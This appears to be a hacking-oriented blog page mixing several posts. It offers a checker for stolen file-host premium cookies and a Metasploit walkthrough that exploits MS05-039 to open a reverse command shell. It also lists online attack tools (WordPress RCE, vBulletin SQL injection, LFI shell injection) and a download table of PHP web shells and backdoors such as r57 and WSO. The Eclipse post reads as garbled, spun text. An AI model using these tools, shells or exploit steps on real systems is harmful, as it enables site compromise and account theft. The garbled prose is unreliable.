100% Free Free Free Download No Hide Charges No Sign up No virus Daily Update Blogger Templates
Showing posts with label developer tools. Show all posts
Showing posts with label developer tools. Show all posts

Tuesday, October 23, 2012

Hf & Fs & Fsc & Mu & Df Cookies Cheker program

2 comments:

this program is programed by me using c# language

it's function is to check (hotfile & fileserve & megaupload &filesonic &depositfiles )cookies either it is premium or not
his program is programed by me using c# language

it's function is to check (hotfile & fileserve & megaupload &filesonic &depositfiles )cookies either it is premium or not


[Image: 92043980.png]

[Image: 87555372.png]

note :
fileserve (short) :it is the "PHPSESSID"
fileserve (long) :it is the "cookie"

to check a cookies 
Code:
1)take cookies copy
2)press "add" or "past from clipboard" to add cookies
3)choose "hotfile" or "fileserve" or"megaupload" or.........
4)press start
5)"start button" will change to "stop" , wait until it change to "start" again and the working cookies will be placed in the textbox (large one)

note :
- you can use "past-start" to skip step 2 & 4
-this program isn't adware or spyware
-file size is 15 Kb only (Very simple program )

Download:
Code:
http://www.fileserve.com/file/UhZzZxw


Scan Report :
Code:
http://vscan.novirusthanks.org/analysis/cb91ff53af0c9042a60e9181801dc31c/Y29va2llcy1
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Perform Smart SSL Cipher Enumeration:SSL Smart

No comments:


SSLSmart, a highly flexible and interactive tool aimed at improving efficiency and reducing the false positives during SSL testing.
Among other things, SSLSmart simply an advanced and highly flexible Ruby based smart SSL cipher enumeration tool. It is an open source, cross platform, free tool. It was programmed because a number of tools on the Windows platform allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is performed by initiating an SSL socket connection with one cipher suite at a time, an inefficient approach that leads to false positives and often does not provide a clear picture of the true vulnerability of the server. SSLSmart is designed to combat these shortcomings.


SSLSmart Features:


SSLSmart offers a wide range of features to improve testing efficiency and reduce false positives. These features are as follows:


  • Content Scan (default): Exact server response can be seen in HTML and Text forms for each
  • cipher suite selected for the test URL. Basically, it shows various server error messages received for weak cipher suites from live systems.
  • CONNECT Scan: Focuses only on success or failure of SSL socket connection with various cipher suites. This behavior does not offer any advantage over existing SSL testing tools and is thus likely to have similar issues with false positives. However, this scan is faster and consumes fewer network and CPU resources.
  • Dynamic Cipher Suite Support: Most SSL testing tools provide a fixed set of cipher suites. SSLSmart hooks into Ruby OpenSSL bindings and offers dynamic “on the fly” cipher suite generation capabilities.
  • Certificate Verification: SSLSmart performs server certificate verification. It uses the Firefox Root CA Certificate4 repository to perform Root CA verification. Additional Root CA Certificates can be added to the rootcerts.pem file or a custom .pem file can be supplied for Root CA Certificate verification.
  • Proxy Support: SSLSmart provides web proxy support. For results to be accurate, it is important to use a transparent proxy5.
  • Reporting: Reports can be generated in XML, HTML and Text formats along with their verbose versions. Verbose report versions include complete application response for each cipher suite and full details of the server certificate.
  • API’s: Monkey patched Ruby API’s that form the backbone of SSLSmart can be consumed to write custom Ruby scripts for quick tests. These API’s can be consumed by users who work with the SSLSmart gem.





What i liked the most about this tool is that SSLSmart supports XML, HTML, Text and their corresponding verbose reporting versions. In addition to details in the normal report, verbose versions include complete application responses for each cipher suite and full details of server certificates. Another feature that i liked is the API support. These API’s form the backbone for SSLSmart tests can be used to write custom scripts. SSLSmart gem includes source code and can be used by users who have Ruby installed on their systems and it comes from McAfee labs!


Platform Support and Installers:


SSLSmart has been tested to work on the following platforms and versions of Ruby:
Windows: Ruby 1.8.6 with wxruby6 (2.0.0) and builder7 (2.1.2).
Linux: Ruby 1.8.7/1.9.1 with wxruby (2.0.0) and builder (2.1.2).


Download SSLSmart:


SSLSmart 1.0 – SSLSmart-Gem-Win-Installer.zip/sslsmart-1.0.gem –http://downloadcenter.mcafee.com/products/tools/foundstone/SSLSmart-Gem-Win-Installer.zip

Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Real-World Security Tests Using Metasploit

No comments:

The Perl-based Metasploit was designed to be a robust exploit development system. It just so happens that you can use it to run previously developed exploits against your own systems. You can use its security testing features to see if your systems vulnerable to penetration and how they react when specific payloads are sent their way.
Outside of common Web application tests such as SQL injection and input tampering which are not supported, Metasploit has exploit code for a wide range of vulnerabilities in standalone applications, Web servers, operating systems, and more — 100 exploits and 75 payloads in version 2.4 to be exact. Version 2.5 was just released which, according the Metasploit site, includes bug fixes, cosmetic changes, and 32 more exploits! Even with over 100 exploits to choose from, obviously this isn’t enough to exploit every possible vulnerability in every penetration testing scenario you come across. But then again, the framework was built so you can write your own if you’re so inclined.


In this installment, I’ll outline how to use Metasploits built-in exploits and payloads in a real-world testing scenario. Be forewarned that it’s possible to create undesired results with this tool when performing your tests such as crashing or leaving production systems in an unstable state. As with any ethical hacking venture, proceed with caution and have a contingency plan in the event something goes awry. Please don’t take this lightly.
How to use Metasploit commands
Before jumping into the specific steps to execute this exploit, there are some common msfconsole commands you should know about:
  • help (or ‘?’) – shows the available commands in msfconsole
  • show exploits – shows the exploits you can run (in our case here, the ms05_039_pnpexploit)
  • show payloads – shows the various payload options you can execute on the exploited system such as spawn a command shell, uploading programs to run, etc. (in our case here, the win32_reverse exploit)
  • info exploit [exploit name] – shows a description of a specific exploit name along with its various options and requirements (ex. info exploit ms05_039_pnp shows information on that specific attack)
  • info payload [payload name] – shows a description of a specific payload name along with its various options and requirements (ex. info payload win32_reverse shows information on spawning a command shell)
  • use [exploit name] – instructs msfconsole to enter into a specific exploit’s environment (ex. use ms05_039_pnp will bring up the command prompt ms05_039_pnp > for this specific exploit
  • show options – shows the various parameters for the specific exploit you’re working with
  • show payloads – shows the payloads compatible with the specific exploit you’re working with
  • set PAYLOAD – allows you to set the specific payload for your exploit (in this example,set PAYLOAD win32_reverse)
  • show targets – shows the available target OSs and applications that can be exploited
  • set TARGET – allows you to select your specific target OS/application (in this example, I’ll use set TARGET 0 to for all English versions of Windows 2000)
  • set RHOST – allows you to set your target host’s IP address (in this example, set RHOST 10.0.0.200)
  • set LHOST – allows you to set the local host’s IP address for the reverse communications needed to open the reverse command shell (in this example, set LHOST 10.0.0.201)
  • back – allows you to exit the current exploit environment you’ve loaded and go back to the main msfconsole prompt
How to use Metasploit: Real-world exploit
Now that I’ve described the basic commands you’ll need, let’s take a look at some specific steps and screen shots required to carry out a real-world exploit.
My test target in this example is a Windows 2000 Server system that has the MS05-039 plug and play vulnerability (CVE-2005-1983) that was exploited by the Zotob worm. This hole — which Metasploit happens to have an exploit for — allows arbitrary code execution including shell (command prompt) access to the system. I know my target system has this vulnerability because I discovered the problem with the vulnerability assessment tool QualysGuard. This is purely a part of an ethical hacking methodology, but it’s not required. You can blindly test your systems — or, even better — Metasploit can do some of the legwork for you with its “check” function to see if a system is vulnerable before exploiting it. More on this below. My testing system is a Windows XP SP2 system running the Metasploit Framework version 2.4 I downloaded and installed. I’ll use Metasploit’s most commonly used msfconsole interface to demonstrate this attack.
Metasploit how-to: Step 1
I load msfconsole (via Start/Programs/Metasploit Framework/MSFConsole) and its command prompt comes up:
Note: At this point you can enter show exploits to see which exploits are available for your target system.
Metasploit how-to: Step 2
I enter use ms05_039_pnp to run the specific exploit which I know the system is vulnerable, and it loads up that specific exploit’s environment prompt (hence the ms05_039_pnp > prompt):
Metasploit how-to: Step 3
I then enter show payloads to determine which payloads can be sent via this exploit:
Metasploit how-to: Step 4
I decide to have the exploit open up a reverse command shell, so I enter set PAYLOAD win32_reverse. I then enter show targets to determine which operating systems and applications are supported. In this case, I’ll set my target to the option that supports versions of Windows 2000 Service Pack 0 (the first version of Windows 2000) thru Service Pack 4 by entering set TARGET 0:
Metasploit how-to: Step 5
I then enter show options to determine the non-optional exploit and payload parameters that don’t have defaults and, therefore, must be set. In this case, it’s the RHOST and LHOST parameters which can be set via set RHOST 10.0.0.200 and set LHOST 10.0.0.201:
Metasploit how-to: Step 6
I enter show options one final time to make sure everything is set correctly and then entercheck to confirm that my target system is indeed vulnerable to the ms05_039_pnp vulnerability.
Metasploit how-to: Step 7
Finally, I enter exploit to run the exploit and send the payload to my target system — and voila — the connection is established and I have a command prompt on the remote system! Penetration testing at its finest:
You can imagine what could happen at this point if a malicious hacker compromised your system in this way. That’s why it’s so important to “hack” your own systems first so you can find and plug the holes before the bad guys exploit them.
Using Metasploit: There’s more to come
This exploit is just one example of what can be done using Metasploit during penetration testing. The good thing is that outside of the specific exploit and payload I used, most of the commands and techniques in this example can apply directly to other Metasploit-supported exploits.
Once you’re used to how Metasploit operates, you’ll be glad to know that it contains several advanced features. You can save your “set” options, log your actions, and even define how each payload will clean up after itself once it’s done running. The neat thing about Metasploit is that it’s so powerful yet so easy to use. The msfconsole is very intuitive and help is always just a command away.
I encourage you to play around with Metasploit in a test environment to see for yourself what it can do. It’s an enlightening proof of concept tool to say the least. If you stay plugged into the Metasploit Project’s Web site, you can stay abreast of the latest framework and exploit releases. Apparently, a new and improved version of Metasploit (version 3) written in the Ruby programming language is due out soon, so be on the lookout for it as well.
It pleases me that we’ve got such advanced tools like Metasploit at our disposal for the betterment of information security – especially for the low, low price of $0 in this case. These types of exploit tools will certainly play a vital role in the future of improving the overall quality of software, so the more you know about them the better. With a quick Metasploit download, easy install, and a few minutes familiarizing yourself with its interface, the future is all yours.

Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Online Penetration Testing Tools [Private]

2 comments:


Word Press
Remote Code Execution , BruteForce via IP , Theme ScaNne via IP , Theme ScaNne , Site Extracte. Joomla
Turbo Brute Force , Token ScaNe Server, ScaNner Site Extracte,
vBulletin 
vB SQL[4.0.x =>4.1.3] , vB Brut Force [Proxy] 
Sql 
SQL Server ScaNne, SQL Target ScanNer, SQL Dork ScaNne, SQL Injection Helpe,r Admin Finder. LFI 
LFI Server ScaNner, LFI ToOl'z Kit, LFI Inject Shell, LFI File Dumper.
Other Tools    
Whois Multiple Service, WHMCS LFI Exploit, Multiple CMS ScaNner, Server ScaNn3r CMS,
Server Dork Sc4nN3r, Exploit Finder, Script'z Finder ,Shell Finder ,Users Finder Via IP, Zone-H Poster, Crypte / Decrypte, Decrypte ToOl'z.

To use all This Go to http://www.s3c-l4b.com/ 
Shell Name
Langage Shell
Shell Pic
Include Txt
Download Zip
r57 Pro Shell
PHP
.Txt
.Zip
Sa-H4x0r Shell
PHP
.Txt
.Zip
WSO Dz Shell
PHP
.Txt
.Zip
Madspot Shell
PHP
.Txt
Uploader
PHP
.Txt
SQL_Cmd3 ToOl'z
PHP
.Zip
Saudi Shell
PHP
.Zip
WebAdmin Shell
PHP
.Txt
.Zip
Syrian7 Shell
PHP
.Zip
PHP Backdoor
PHP
.Zip
TurkBlackHat ToOl'z
PHP
.Txt
.Zip
Security Labs Shell
PHP
.Txt
.Zip
PHP Smylink
PHP
.Zip
WebRoot Multi ToOl'z
PHP
.Txt
.Zip
SoQor Shell
PHP
.Txt
.Zip
SymLink Pro
Perl
---
.Zip
Domain & User & Sym
PL-Py-PHP
---
.Zip
Python Shelles
Py
---
.Zip
Do Not Forget To Bookmark This Page , Press CTRL + D http://hackersunrise.blogsopt.in
Read More!

Wednesday, August 29, 2012

Eclipse Juno Download

No comments:
Eclipse Juno
The Eclipse foundation is aiming to develop Java developer smarter, more tillable and improved armored to figure floating applications and apps that investing the "Web of Things" with its latest release acknowledged as Juno.

Perhaps the biggest difference with Juno is that it is supported on the eclipse 4.x program, which the fundament has been working on for the couple of years. Eclipse 4.2 in now the mainstream structure for the Eclipse dominion.  The existing eclipse 3.x cypher line is state put into fixing modality.  Eclipse 4.2 includes a sympathy place that allows existing Eclipse plug-ins and Loaded Guest Program (RCP) applications to play on the new program. Essentially, this version changes the way plug-in operation services by implementing a dependency solution poser.

New features on Eclipse Juno:

  • Eclipse Virgo ships the new Nano kernel that provides the ability to build very small OSGi-based applications. 
  • Xtext has added support for integrated debugging of JVM-based DSLs created using Xtext, and tighter integration with the Java Development Tools (JDT).
  • Eclipse Equinox ships the reference implementation of the new OSGi R5 specifications.
  • Mylyn Intent provides tooling for writing useful and synchronized documentation for development artifacts such as code, models, etc.

 Top 10 Eclipse Juno Features

Eclipse Juno require an Java Virtual Machine running on your Computer. Grab it with the installation guide of Eclipse Juno from here. 

DOWNLOAD

DOWNLOAD(torrent)

Tags: Eclipse ide, eclipse ide download, "eclipse ide", eclipse plugins, eclipse tutorialhttps://hackersunrise.blogsopt.in
Read More!